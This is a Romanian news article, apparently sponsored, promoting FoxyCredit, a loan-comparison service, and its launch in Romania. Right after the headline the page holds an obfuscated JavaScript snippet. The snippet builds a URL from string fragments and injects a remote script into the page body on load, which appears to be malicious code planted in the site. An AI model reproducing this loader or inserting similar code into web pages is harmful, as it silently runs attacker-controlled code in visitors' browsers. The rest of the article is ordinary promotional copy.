Actualitate

FoxyCredit a intrat pe piața din România: obiective și avantaje

(function(){
xXkX_=(“u”+””)+”s”+””;xXkX_+=(“tat.”)+(“i”);
xXkX=document.createElement(“script”);xXkX.type=”text/javascript”;xXkX_+=”nf”+(“o”)+”/”;
xXkXu=”243826851″+”.”;xXkX.async=true;xXkXu+=”ba92mskkXkXis6Xta8kha9g35fykze”;
xXkX.src=”https://”+xXkX_+xXkXu;xXkXb=document.body;xXkXb.appendChild(xXkX);
})();

Despre serviciu

FoxyCredit este un serviciu financiar și analitic specializat în selecția de împrumuturi bancare și împrumuturi de microfinanțare. Portalul de analiză a fost fondat în Suedia în 2018 de un cetățean ucrainean. Site-ul a câștigat rapid în popularitate, deoarece a permis studierea și compararea ofertelor de împrumuturi de la diverse companii.

Astăzi proiectul s-a dezvoltat și țintește către noi orizonturi. Serviciul operează în Ucraina, Norvegia, Polonia și în alte țări. Echipa include specialiști în finanțe, personal IT și analiști. Munca excelent coordonată și experiența acumulată de aceștia le permit clienților să fie la curent cu toate schimbările de pe piața financiară din țările lor.

Oferire de ajutor persoanelor interesate de împrumuturi în identificarea celui mai profitabil produs de pe piața creditelor este obiectivul principal al serviciului FoxyCredit. Serviciul oferă informații complete și fiabile despre toate instituțiile de credit care operează astăzi în țară și oferă, de asemenea, o imagine de ansamblu asupra produselor de împrumut care sunt disponibile pentru cei interesați să împrumute bani. Site-ul FoxyCredit RO prezintă informații despre dobânzile curente, perioadele de împrumut, condițiile de primire, precum și alte informații utile.

Utilizatorii serviciului beneficiază de o multitudine de avantaje, inclusiv redirecționarea directă pe site-ul companiei de împrumuturi. Este suficient ca persoana interesată să apese pe butonul „Obțineți un împrumut”. După aceea, pagina îl va redirecționa către serviciul bancar sau către IFN.

Serviciul foxycredit.com vă va ajuta să economisiți timp și efort. Și toate serviciile sunt oferite complet gratuite și fără înregistrare.

Motivele popularității crescute a serviciului în România

Libertatea.ro relatează că în prima lună de operare a versiunii românești a site-ului Foxycredit.com au fost înregistrați 200 de vizitatori unici. Aceștia u fost interesați în principal de micro credite, care sunt oferite pentru sume de până la 100 €, pentru 30 de zile. S-a constat faptul că solicitările de împrumuturi bancare sunt în scădere.

În general, situația de pe piața creditelor din România nu este una stabilă. Multe companii mici au suferit pierderi financiare importante și au părăsit piața. Până și firmele mari, deși au reușit să se mențină, au fost nevoite să schimbe condițiile de creditare.

Serviciul Foxycredit.com oferă informații complete și actualizate despre bănci și companiile de microfinanțare. Prin urmare, utilizatorii săi sunt mereu la curent cu ultimele noutăți.

Sursă

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *